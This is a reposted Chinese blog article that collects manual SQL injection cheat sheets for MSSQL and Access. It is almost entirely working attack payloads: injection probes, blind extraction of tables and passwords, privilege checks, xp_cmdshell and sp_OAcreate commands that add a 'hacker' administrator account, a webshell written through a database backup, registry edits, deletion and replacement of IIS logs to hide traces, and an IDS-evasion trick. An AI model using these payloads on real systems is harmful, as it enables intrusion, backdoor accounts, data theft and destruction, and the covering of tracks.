【轉(zhuǎn)】手工sql注入

1.判斷是否有注入

;and 1=1

;and 1=2

2.初步判斷是否是mssql

;and user>0

3.判斷數(shù)據(jù)庫(kù)系統(tǒng)

;and (select count(*) from sysobjects)>0 mssql

;and (select count(*) from msysobjects)>0 access

4.注入?yún)?shù)是字符

'and [查詢條件] and ''='

5.搜索時(shí)沒(méi)過(guò)濾參數(shù)的

'and [查詢條件] and '%25'='

6.猜數(shù)據(jù)庫(kù)

;and (select Count(*) from [數(shù)據(jù)庫(kù)名])>0

7.猜字段

;and (select Count(字段名) from 數(shù)據(jù)庫(kù)名)>0

8.猜字段中記錄長(zhǎng)度

;and (select top 1 len(字段名) from 數(shù)據(jù)庫(kù)名)>0

9.(1)猜字段的ascii值(access)

;and (select top 1 asc(mid(字段名,1,1)) from 數(shù)據(jù)庫(kù)名)>0

(2)猜字段的ascii值(mssql)

;and (select top 1 unicode(substring(字段名,1,1)) from 數(shù)據(jù)庫(kù)名)>0

10.測(cè)試權(quán)限結(jié)構(gòu)(mssql)

;and 1=(select IS_SRVROLEMEMBER('sysadmin'));--

;and 1=(select IS_SRVROLEMEMBER('serveradmin'));--

;and 1=(select IS_SRVROLEMEMBER('setupadmin'));--

;and 1=(select IS_SRVROLEMEMBER('securityadmin'));--

;and 1=(select IS_SRVROLEMEMBER('diskadmin'));--

;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));--

;and 1=(select IS_MEMBER('db_owner'));--

11.添加mssql和系統(tǒng)的帳戶

;exec master.dbo.sp_addlogin username;--

;exec master.dbo.sp_password null,username,password;--

;exec master.dbo.sp_addsrvrolemember sysadmin username;--

;exec master.dbo.xp_cmdshell 'net user username password /workstations:* /times:all /passwordchg:yes /passwordreq:yes /active:yes /add';--

;exec master.dbo.xp_cmdshell 'net user username password /add';--

;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';--

12.(1)遍歷目錄

;create table dirs(paths varchar(100), id int)

;insert dirs exec master.dbo.xp_dirtree 'c:\'

;and (select top 1 paths from dirs)>0

;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>)

(2)遍歷目錄

;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));--

;insert temp exec master.dbo.xp_availablemedia;-- 獲得當(dāng)前所有驅(qū)動(dòng)器

;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 獲得子目錄列表

;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 獲得所有子目錄的目錄樹結(jié)構(gòu)

;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看文件的內(nèi)容

13.mssql中的存儲(chǔ)過(guò)程

xp_regenumvalues 注冊(cè)表根鍵, 子鍵

;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run' 以多個(gè)記錄集方式返回所有鍵值

xp_regread 根鍵,子鍵,鍵值名

;exec xp_regread 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir' 返回制定鍵的值

xp_regwrite 根鍵,子鍵, 值名, 值類型, 值

值類型有2種REG_SZ 表示字符型,REG_DWORD 表示整型

;exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestvalueName','reg_sz','hello' 寫入注冊(cè)表

xp_regdeletevalue 根鍵,子鍵,值名

exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestvalueName' 刪除某個(gè)值

xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey' 刪除鍵,包括該鍵下所有值

14.mssql的backup創(chuàng)建webshell

use model

create table cmd(str image);

insert into cmd(str) values ('');

backup database model to disk='c:\l.asp';

15.mssql內(nèi)置函數(shù)

;and (select @@version)>0 獲得Windows的版本號(hào)

;and user_name()='dbo' 判斷當(dāng)前系統(tǒng)的連接用戶是不是sa

;and (select user_name())>0 爆當(dāng)前系統(tǒng)的連接用戶

;and (select db_name())>0 得到當(dāng)前連接的數(shù)據(jù)庫(kù)

16.簡(jiǎn)潔的webshell

use model

create table cmd(str image);

insert into cmd(str) values ('');

backup database model to disk='g:\wwwtest\l.asp';

請(qǐng)求的時(shí)候,像這樣子用:

http://ip/l.asp?c=dir


SQL手工注入大全

前提需要工具:SQL Query Analyzer和SqlExec Sunx Version

1.去掉xp_cmdshell擴(kuò)展過(guò)程的方法是使用如下語(yǔ)句:

if exists (select * from dbo.sysobjects where id=object_id(N'[dbo].[xpcmdshell]') and OBJECTPROPERTY(id,N'IsExtendedProc')=1)

exec sp_dropextendedproc N'[dbo].[xp_cmdshell]'

2.添加xp_cmdshell擴(kuò)展過(guò)程的方法是使用如下語(yǔ)句:

(1)SQL Query Analyzer

sp_addextendedproc xp_cmdshell,@dllname='xplog70.dll'

(2)首先在SqlExec Sunx Version的Format選項(xiàng)里填上%s,在CMD選項(xiàng)里輸入

sp_addextendedproc 'xp_cmdshell','xpsql70.dll'

去除

sp_dropextendedproc 'xp_cmdshell'

(3)MSSQL2000

sp_addextendedproc 'xp_cmdshell','xplog70.dll'

?

SQL手工注入方法總結(jié)(SQL Server2005)2010-01-28 16:17---------以下以省略注入點(diǎn)用URL代替

--(1) ******查看驅(qū)動(dòng)器方法******

-- 建表p(i為自動(dòng)編號(hào),a記錄盤符類似"c:\",b記錄可用字節(jié),其它省略)

URL;create table p(i int identity(1,1),a nvarchar(255),b nvarchar(255),c nvarchar(255),d nvarchar(255));--

URL;insert p exec xp_availablemedia;--列出所有驅(qū)動(dòng)器并插入表p

URL;and (select count(*) from p)>3;--折半法查出驅(qū)動(dòng)器總數(shù)

URL;and ascii(substring((select a from p where i=1),1,1))=67;--折半法查出驅(qū)動(dòng)器名(注asc(c)=67)

--上面一般用于無(wú)顯錯(cuò)情況下使用-------以此類推,得到所有驅(qū)動(dòng)器名

URL;and (select a from p where i=1)>3;--報(bào)錯(cuò)得到第一個(gè)驅(qū)動(dòng)器名

--上面一般用于顯錯(cuò)情況下使用-------以此類推,得到所有驅(qū)動(dòng)器名

URL;;drop table p;--刪除表p

--(2) ******查看目錄方法******

URL;create table pa(m nvarchar(255),i nvarchar(255));--建表pa(m記錄目錄,i記錄深度)

URL;insert pa exec xp_dirtree ’e:’;--列出驅(qū)動(dòng)器e并插入表pa

URL;and (select count(*) from pa where i>0)>-1;--折半法查出i深度

URL;and (select top 1 m from pa where i=1 and m not in(select top 0 m from pa))>0;--報(bào)錯(cuò)得到深度i=1的第一個(gè)目錄名

--上面一般用顯錯(cuò)且目錄名不為數(shù)字情況下使用-------(得到第二個(gè)目錄把"top 0"換為"top 1",換深度只換i就行)以此類推,得到e盤的所有目錄

URL;and len((select top 1 m from pa where i=1 and m not in(select top 0 m from pa)))>0;--折半法查出深度i=1的第一個(gè)目錄名的長(zhǎng)度

URL;and ascii(substring((select top 1 m from pa where i=1 and m not in(select top 0 m from pa)),1,1))>0;--折半法查出深度i=1的第一個(gè)目錄名的第一個(gè)字符長(zhǎng)度

--上面一般用無(wú)顯錯(cuò)情況下使用-------(得到第二個(gè)目錄把"top 0"換為"top 1",換深度只換i就行)以此類推,得到e盤的所有目錄

URL;drop


手工MSSQL注入常用SQL語(yǔ)句

and exists (select * from sysobjects) //判斷是否是MSSQL

and exists(select * from tableName) //判斷某表是否存在..tableName為表名

and 1=(select @@VERSION) //MSSQL版本

And 1=(select db_name()) //當(dāng)前數(shù)據(jù)庫(kù)名

and 1=(select @@servername) //本地服務(wù)名

and 1=(select IS_SRVROLEMEMBER(‘sysadmin’)) //判斷是否是系統(tǒng)管理員

and 1=(Select IS_MEMBER(‘db_owner’)) //判斷是否是庫(kù)權(quán)限

and 1= (Select HAS_DBACCESS(‘master’)) //判斷是否有庫(kù)讀取權(quán)限

and 1=(select name from master.dbo.sysdatabases where dbid=1) //暴庫(kù)名DBID為1,2,3….

;declare @d int //是否支持多行

and 1=(Select count(*) FROM master.dbo.sysobjects Where xtype = ‘X’ AND name = ‘xp_cmdshell’) //判斷XP_CMDSHELL是否存在

and 1=(select count(*) FROM master.dbo.sysobjects where name= ‘xp_regread’) //查看XP_regread擴(kuò)展存儲(chǔ)過(guò)程是不是已經(jīng)被刪除

添加和刪除一個(gè)SA權(quán)限的用戶test:(需要SA權(quán)限)

exec master.dbo.sp_addlogin test,password

exec master.dbo.sp_addsrvrolemember test,sysadmin

停掉或激活某個(gè)服務(wù)。 (需要SA權(quán)限)

exec master..xp_servicecontrol ‘stop’,’schedule’

exec master..xp_servicecontrol ‘start’,’schedule’

暴網(wǎng)站目錄

create table labeng(lala nvarchar(255), id int)

DECLARE @result varchar(255) EXEC master.dbo.xp_regread ‘HKEY_LOCAL_MACHINE’,’SYSTEM\ControlSet001\Services\W3SVC\Parameters\Virtual Roots’,’/’,@result output insert into labeng(lala) values(@result);

and 1=(select top 1 lala from labeng) 或者and 1=(select count(*) from labeng where lala>1)

—————————————————————————————————————————————————————分割

SQL Server

判斷是否可注射:

http://www.exehack.net/article.asp?id=6

http://www.exehack.net/article.asp?id=6′

http://www.exehack.net/article.asp?id=6 and 1=1

http://www.exehack.net/article.asp?id=6 and 1=2

http://www.exehack.net/article.asp?action=value’ and 1=1

http://www.exehack.net/article.asp?action=value’ and 1=2

searchpoints%’ and 1=1

searchpoints%’ and 1=2

確定數(shù)據(jù)庫(kù)類型:

http://www.exehack.net/article.asp?id=6 and user>0

http://www.exehack.net/article.asp?id=6 and (select count(*) from sysobjects)>0

查詢當(dāng)前用戶數(shù)據(jù)信息:

article.asp?id=6 having 1=1–

暴當(dāng)前表中的列:

article.asp?id=6 group by admin.username having 1=1–

article.asp?id=6 group by admin.username,admin.password having 1=1–

暴任意表和列:

and (select top 1 name from (select top N id,name from sysobjects where xtype=char(85)) T order by id desc)>1

and (select top col_name(object_id(‘a(chǎn)dmin’),N) from sysobjects)>1

暴數(shù)據(jù)庫(kù)數(shù)據(jù):

and (select top 1 password from admin where id=N)>1

修改數(shù)據(jù)庫(kù)中的數(shù)據(jù):

;update admin set password=’oooooo’ where username=’xxx’

增添數(shù)據(jù)庫(kù)中的數(shù)據(jù):

;insert into admin values (xxx,oooooo)–

刪數(shù)據(jù)庫(kù):

;drop database webdata

獲取當(dāng)前數(shù)據(jù)庫(kù)用戶名:and user>0

獲取當(dāng)前數(shù)據(jù)庫(kù)名:and db_name()>0

獲取數(shù)據(jù)庫(kù)版本:and (select @@version)>0

判斷是否支持多句查詢:;declare @a int–

判斷是否支持子查詢:and (select count(1) from [sysobjects])>=0

數(shù)據(jù)庫(kù)的擴(kuò)展存儲(chǔ)過(guò)程:exec master..xp_cmdshell

查看服務(wù)器C盤目錄:;exec_master..xp_cmdshell ‘dir c:\’

判斷擴(kuò)展存儲(chǔ)過(guò)程是否存在:and select count(*) from master.dbo.sysobjects where xtype=’x’ and name=’xp_cmdshell’

恢復(fù)擴(kuò)展存儲(chǔ)過(guò)程:;exec sp_addextendedproc xp_cmdshell,’xplog70.dll’

刪除擴(kuò)展存儲(chǔ)過(guò)程:;exec sp_dropextendedproc ‘xp_cmdshell’

在MSSQL2000中提供了一些函數(shù)用于訪問(wèn)OLE對(duì)象間接獲取權(quán)限:

;declare @s int

;exec sp_oacreat ‘wscript.shell’,@s

;exec master..spoamethod @s,’run’,null,’cmd.exe/c dir c:\’

判斷當(dāng)前數(shù)據(jù)庫(kù)用戶名是否擁有比較高的權(quán)限:

and 1=(select is_srvrolemember(‘sysadmin’))

and 1=(select is_srvrolemember(‘serveradmin’))

and 1=(select is_srvrolemember(‘setupadmin’))

and 1=(select is_srvrolemember(‘securityadmin’))

and 1=(select is_srvrolemember(‘diskadmin’))

and 1=(select is_srvrolemember(‘bulkadmin’))

判斷當(dāng)前數(shù)據(jù)庫(kù)用戶名是否為DB_OWNER:

and 1=(select is_member(‘db_owner’))

在SQLSERVER的master.dbo.sysdatabases表中存放著SQLSERVER數(shù)據(jù)庫(kù)系統(tǒng)中的所有數(shù)據(jù)庫(kù)信息,只需要PUBLIC權(quán)限就可以對(duì)此表進(jìn)行SELECT操作:

and (select top 1 name from master.dbo.sysdatabase order by dbid)>0

and (select top 1 name from master.dbo.sysdatabase where name not in(select top 1 name from master.dbo.sysdatabases order by dbid) order by dbid)>0

刪除日志記錄:

;exec master.dbo.xp_cmdshell ‘del c:\winnt\system32\logfiles\w3svc5\ex070606.log >c:\temp.txt’

替換日志記錄:

;exec master.dbo.xp_cmdshell ‘copy c:\winnt\system32\logfiles\w3svc5\ex070404.log c:\winnt\system32\logfiles\w3svc5\ex070606.log >c:\temp.txt’

獲取WEB路徑:

;declare @shell int

;exec master..sp_oamethod ‘wscript.shell’,@shell out

;exec master..sp_oamethod @shell,’run’,null,’cmd.exe/c dir /s d:/index.asp >c:/log.txt

利用XP_CMDSHELL搜索:

;exec master..xp_cmdshell ‘dir /s d:/index.asp’

顯示服務(wù)器網(wǎng)站配置信息命令:

cmd /c cscript.exe c:\inetpub\adminscript\adsutil.vbs enum w3svc/1/root

cmd /c cscript.exe c:\inetpub\adminscript\adsutil.vbs enum w3svc/2/root

利用XP_REGREAD可用PUBLIC權(quán)限讀取:

;exec master.dbo.xp_regread

hkey_local_machine,

‘system\currentcontrolset\services\w3svc\parameters\virtual roots\’

‘/’

SQLSERVER下的高級(jí)技術(shù)可以參考閱讀曾云好所著的精通腳本黑客第五章。

3、DSqlHelper

檢測(cè)權(quán)限SYSADMIN:

and 1=(select IS_SRVROLEMEMBER(‘sysadmin’))

serveradmin、setupadmin、securityadmin、diskadmin、bulkadmin、db_owner。

檢測(cè)XP_CMDSHELL(CMD命令):

and 1=(SELECT count(*) FROM master.dbo.sysobjects WHERE name= ‘xp_cmdshell’)

檢測(cè)XP_REGREAD(注冊(cè)表讀取功能):

and 1=(SELECT count(*) FROM master.dbo.sysobjects WHERE name= ‘xp_regread’)

檢測(cè)SP_MAKEWEBTASK(備份功能):

and 1=(SELECT count(*) FROM master.dbo.sysobjects WHERE name= ‘sp_makewebtask’)

檢測(cè)SP_ADDEXTENDEDPROC:

and 1=(SELECT count(*) FROM master.dbo.sysobjects WHERE name= ‘sp_addextendedproc’)

檢測(cè)XP_SUBDIRS讀子目錄:

and 1=(SELECT count(*) FROM master.dbo.sysobjects WHERE name= ‘xp_subdirs’)

檢測(cè)XP_DIRTREE讀子目錄:

and 1=(SELECT count(*) FROM master.dbo.sysobjects WHERE name= ‘xp_dirtree’)

修改內(nèi)容:

; UPDATE 表名 set 字段=內(nèi)容 where 1=1

XP_CMDSHELL檢測(cè):

;exec master..xp_cmdshell ‘dir c:\’

修復(fù)XP_CMDSHELL:

;exec master.dbo.sp_addextendedproc ‘xp_cmdshell’, ‘xplog70.dll’

用XP_CMDSHELL添加用戶hacker:

;exec master.dbo.xp_cmdshell ‘net user hacker 123456 /add’

XP_CMDSHELL把用戶hacker加到ADMIN組:

;exec master.dbo.xp_cmdshell ‘net localgroup administrators hacker /add’

創(chuàng)建表test:

;create table [dbo].[test] ([dstr][char](255));

檢測(cè)表段test:

and exists (select * from test)

讀取WEB的位置(讀注冊(cè)表):

;DECLARE @result varchar(255) EXEC master.dbo.xp_regread ‘HKEY_LOCAL_MACHINE’,’SYSTEM\ControlSet001\Services\W3SVC\Parameters\Virtual Roots’, ‘/’,@result output insert into test (dstr) values(@result);–

爆出WEB的絕對(duì)路徑(顯錯(cuò)模式):

and 1=(select count(*) from test where dstr > 1)

刪除表test:

;drop table test;–

創(chuàng)建查看目錄的表dirs:

;create table dirs(paths varchar(100), id int)

把查看目錄的內(nèi)容加入表dirs:

;insert dirs exec master.dbo.xp_dirtree ‘c:\’

爆目錄的內(nèi)容dirs:

and 0<>(select top 1 paths from dirs)

備份數(shù)據(jù)庫(kù)DATANAME:

declare @a sysname; set @a=db_name();backup DATANAME @a to disk=’c:\inetpub\wwwroot\down.bak’;–

刪除表dirs:

;drop table dirs;–

創(chuàng)建表temp:

;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));–

把驅(qū)動(dòng)盤列表加入temp表:

;insert temp exec master.dbo.xp_availablemedia;–

刪除表temp:

;delete from temp;–

創(chuàng)建表dirs:

;create table dirs(paths varchar(100), id int);–

獲得子目錄列表XP_SUBDIRS:

;insert dirs exec master.dbo.xp_subdirs ‘c:\’;–

爆出內(nèi)容(顯錯(cuò)模式):

and 0<>(select top 1 paths from dirs)

刪除表dirs:

;delete from dirs;–

創(chuàng)建表dirs:

;create table dirs(paths varchar(100), id int)–

用XP_CMDSHELL查看目錄內(nèi)容:

;insert dirs exec master..xp_cmdshell ‘dir c:\’

刪除表dirs:

;delete from dirs;–

檢測(cè)SP_OAcreate(執(zhí)行命令):

and 1=(SELECT count(*) FROM master.dbo.sysobjects WHERE name= ‘SP_OAcreate’)

SP_OAcreate執(zhí)行CMD命令:

;DECLARE @shell INT EXEC SP_OAcreate ‘wscript.shell’,@shell OUTPUT EXEC SP_OAMETHOD @shell,’run’,null, ‘C:\WINNT\system32\cmd.exe /c net user hacker 123456 /add’

SP_OAcreate建目錄:

;DECLARE @shell INT EXEC SP_OAcreate ‘wscript.shell’,@shell OUTPUT EXEC SP_OAMETHOD @shell,’run’,null, ‘C:\WINNT\system32\cmd.exe /c md c:\inetpub\wwwroot\1111’

創(chuàng)建一個(gè)虛擬目錄E盤:

;declare @o int exec sp_oacreate ‘wscript.shell’, @o out exec sp_oamethod @o, ‘run’, NULL,’ cscript.exe c:\inetpub\wwwroot\mkwebdir.vbs -w “默認(rèn) Web 站點(diǎn)” -v “e”,”e:\”‘

設(shè)置虛擬目錄E為可讀:

;declare @o int exec sp_oacreate ‘wscript.shell’, @o out exec sp_oamethod @o, ‘run’, NULL,’ cscript.exe c:\inetpub\wwwroot\chaccess.vbs -a w3svc/1/ROOT/e +browse’

啟動(dòng)SERVER服務(wù):

;exec master..xp_servicecontrol ‘start’, ‘server’

繞過(guò)IDS檢測(cè)XP_CMDSHELL:

;declare @a sysname set @a=’xp_’+’cmdshell’ exec @a ‘dir c:\’

開啟遠(yuǎn)程數(shù)據(jù)庫(kù)1:

; select * from OPENROWSET(‘SQLOLEDB’, ‘server=servername;uid=sa;pwd=apachy_123’, ‘select * from table1’ )

開啟遠(yuǎn)程數(shù)據(jù)庫(kù)2:

;select * from OPENROWSET(‘SQLOLEDB’, ‘uid=sa;pwd=apachy_123;Network=DBMSSOCN;Address=202.100.100.1,1433;’, ‘select * from table’

最后編輯于
?著作權(quán)歸作者所有,轉(zhuǎn)載或內(nèi)容合作請(qǐng)聯(lián)系作者
【社區(qū)內(nèi)容提示】社區(qū)部分內(nèi)容疑似由AI輔助生成,瀏覽時(shí)請(qǐng)結(jié)合常識(shí)與多方信息審慎甄別。
平臺(tái)聲明:文章內(nèi)容(如有圖片或視頻亦包括在內(nèi))由作者上傳并發(fā)布,文章內(nèi)容僅代表作者本人觀點(diǎn),簡(jiǎn)書系信息發(fā)布平臺(tái),僅提供信息存儲(chǔ)服務(wù)。

相關(guān)閱讀更多精彩內(nèi)容

  • 姓名:于川皓 學(xué)號(hào):16140210089 轉(zhuǎn)載自:https://baike.baidu.com/item/sq...
    道無(wú)涯_cc76閱讀 2,049評(píng)論 0 2
  • 50個(gè)常用的sql語(yǔ)句Student(S#,Sname,Sage,Ssex) 學(xué)生表Course(C#,Cname...
    哈哈海閱讀 1,335評(píng)論 0 7
  • 50個(gè)常用的sql語(yǔ)句 Student(S#,Sname,Sage,Ssex) 學(xué)生表 Course(C#,Cna...
    最美的太陽(yáng)WW閱讀 3,444評(píng)論 0 23
  • 什么是SQL數(shù)據(jù)庫(kù): SQL是Structured Query Language(結(jié)構(gòu)化查詢語(yǔ)言)的縮寫。SQL是...
    西貝巴巴閱讀 2,008評(píng)論 0 10
  • 很多人都在簡(jiǎn)書寫東西,寫軟文,寫心靈雞湯,寫小說(shuō),寫詩(shī),用各種標(biāo)題吸引人的目光,我誤打誤撞來(lái)到這里,也嘗試一...
    又見一刀閱讀 287評(píng)論 3 2

友情鏈接更多精彩內(nèi)容